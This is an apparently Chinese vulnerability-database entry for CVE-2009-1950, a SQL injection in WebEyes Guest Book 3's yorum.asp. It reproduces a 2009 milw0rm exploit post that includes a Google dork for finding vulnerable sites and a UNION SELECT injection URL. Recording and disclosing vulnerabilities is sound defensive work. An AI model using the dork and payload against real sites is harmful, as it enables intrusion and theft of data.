WebEyes Guest Book 'yorum.asp' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117886 漏洞类型 SQL注入
发布时间 2009-06-02 更新时间 2009-06-02
CVE编号 CVE-2009-1950 CNNVD-ID CNNVD-200906-088
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8859
https://www.securityfocus.com/bid/44371
https://cxsecurity.com/issue/WLB-2009060109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-088
|漏洞详情
WebEyesGuestBook3版本的yorum.asp中存在SQL注入漏洞。远程攻击者可以借助mesajid参数,执行任意SQL指令。
|漏洞EXP
000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000


(
[+] Script               : WEBEYES GUEST BOOK v.3 

[+] Exploit Type         : Remote sql injection exploit

[+] Google Dork          : intitle:WEBEYES GUEST BOOK     inurl:.asp?id=

[+] Contact              : blackbeard-sql A.T hotmail.fr 

--//--> Exploit : 

Remote sql injection Exploit :

http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects

[peace xD]

# milw0rm.com [2009-06-02]
|受影响的产品
WebEyes Guest Book WebEyes Guest Book 3
|参考资料

来源:MILW0RM
名称:8859
链接:http://www.milw0rm.com/exploits/8859
来源:SECUNIA
名称:35290
链接:http://secunia.com/advisories/35290